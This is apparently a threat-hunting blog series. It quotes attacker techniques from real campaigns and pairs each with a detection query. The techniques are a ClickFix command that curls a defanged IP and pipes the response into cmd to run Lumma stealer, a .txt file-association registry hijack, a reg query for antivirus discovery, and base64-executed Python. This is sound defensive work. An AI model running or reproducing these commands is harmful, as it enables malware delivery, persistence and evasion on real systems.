Know Your Adversary

Hello everyone! We already looked at many ClickFix variations, but adversaries keep experimenting with this technique, so we can get more and more detection and hunting opportunities. This time we'll look at another example used by threat actors to deliver Lumma stealer. The victim is expected to run the following command: cmd.exe /c start "" /min cmd /k "curl -s hXXp://85.209.129[.]105:2020/19 | cmd && exit; capcha code 74585 Here we can see that the adversary used command line arguments to start download process with the new window minimized. You won't see it very often to be used in legitimate way, so we can use it to create a hunting query: event_type: "processcreatewin" AND proc_file_path: "cmd.exe" AND cmdline: ("start" AND "min") See you tomorrow!

Hello everyone! Recently I spotted another persistence technique I don't see to be used by adversaries often. I'm talking about the following technique:  Change Default File Association (T1546.001) . According to this report ,  TinyLoader modified the following registry key to hijack how Windows handles text files: HKEY_CLASSES_ROOT\txtfile\shell\open\command This allows the malware to be executed every time a victim opens a .txt file. So, we can hunt for registry modification events related to this key: event_type: "registryvaluesetwin" AND reg_key_path: "txtfile\\shell\\open\\command" See you tomorrow!

Hello everyone! It's very important for an adversary to collect information about security software available on the compromised system. Let's look at another real-world example demonstrating how threat actors leverage  Security Software Discovery (T1518.001) and Query Registry (T1012) . So, according to this report ,  TamperedChef abused reg.exe (yes, again) to query system registry on order to obtain information about security software installed, for example: reg query "HKLM\Software\Microsoft\Windows\CurrentVersion\Uninstall\Bitdefender" /v "UninstallString" We can use security software names to build our detection: event_type: "processcreatewin" AND proc_file_path: "reg.exe" AND cmdline: ("query" AND ("bitdefender" OR "g data antivirus" OR "checkpoint" OR "kasperskylabsetup" OR "fortinet" OR "zillya antivirus")) See you tomorrow!

Hello everyone! We all are a bit tired of PowerShell. Even adversaries. So today we'll look how they misuse another popular command and scripting interpreter - Python (T1059.006) . According to this report , the adversary used AI-themed lures to trick a victim to install  ScreenConnect . Next the threat actors run a malicious BAT file, which, among other things, executed a renamed pythonw.exe to run a base64-encoded command: "pw.exe" -c "import base64;exec(base64.b64decode('aW1wb3J0IHl6aXJpcyY2F...'))" In general, nothing new, right? Base64 again. But why not to use it for hunting: event_type: "processcreatewin" AND proc_file_originalfilename: "pythonw.exe" AND cmdline: "base64.b64decode" See you tomorrow!